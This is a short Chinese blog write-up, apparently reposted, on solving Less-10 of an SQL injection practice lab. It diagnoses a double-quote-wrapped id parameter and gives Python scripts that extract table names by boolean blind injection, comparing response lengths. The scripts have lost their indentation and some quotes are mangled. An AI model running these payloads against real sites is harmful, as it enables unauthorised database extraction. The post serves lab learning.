对注入测试的时候 出现了 错误
$id = ‘"‘.$id.‘"‘;
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
sql 语句接受的参数 拼接
传入的参数
?id=1
?id=1‘
我都两次注入的结果bp抓吧 发现没有然后差别
于是开始比对
决定翻看源码
他将id 拼接 也就是 当 id=1‘ 的时候sql语句是
"SELECT * FROM users WHERE id="1‘" LIMIT 0,1";
?
经过测试 1‘ 1" 在不同的引号包裹下是相同的
SELECT * FROM users WHERE 1="1‘" LIMIT 0,1;
SELECT * FROM users WHERE 1=‘1"‘ LIMIT 0,1;
这就是对于sql注入的判读错误导致的
正确语句
https://sql.alienwares.top/Less-10/?id=‘
#r 714
#e 746
import requests
url= 'https://sql.alienwares.top/Less-10/?id=1" and 1=1 %23'
res=requests.get(url)
print(len(res.content))
?
#查看正确的和错误的长度
python 脚本
import requests
import time
#706
for i in range(1,100):
url ="https://sql.alienwares.top/Less-10/?id=1%22 and (select mid((select group_concat(table_name) from information_schema.tables where table_schema=database())," + str(i) + ",1) )=‘,‘%23"
res = requests.get(url)
time.sleep(2)
if (len(res.content) == 714):
print(",",end="")
continue
for e in range(ord("a"), ord("z") + 1):
url="https://sql.alienwares.top/Less-10/?id=1%22 and (select mid((select group_concat(table_name) from information_schema.tables where table_schema=database()),"+str(i)+",1) )=‘"+chr(e)+"‘%23"
print(url)
res=requests.get(url)
time.sleep(1)
if (len(res.content) == 714):
print(chr(e), end="")
break
原文:https://www.cnblogs.com/hackering/p/14235759.html